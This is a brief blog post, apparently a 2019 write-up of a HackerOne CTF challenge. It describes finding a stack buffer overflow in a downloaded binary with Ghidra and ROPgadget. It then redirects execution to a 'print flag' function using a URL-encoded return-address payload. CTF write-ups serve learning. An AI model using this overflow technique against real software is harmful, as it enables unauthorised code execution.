Log in

No account? Create an account

Sun, Jun. 2nd, 2019, 04:03 pm
HackerOne CTF Hello World!

On this CTF you face a "What is your name?" and an option to download the binary. 

After downloading it and Ghidra, we open it up and see the name goes into a 0x20 buffer on the stack.   Ok, we should be able to overrun it and overwrite the return value.   After plopping in some characters it looks like I can enter 40 and on next one I get a 'segmentation fault' message.

Well, I dump the ROP gadgets, using 'ROPgadget --binary vulnerable-bin' command in Kali and take a further look.  Ok.. digging further into the binary, I see a 'print flag' function.  Ok, may not need the gadgets.

I just need to convert the address to the right order.   Basically, take 0x004006ee and convert to a 64 bit pointer that is url encoded.    %ee%06%40%00%00%00%00%00

Boom, it prints the flag.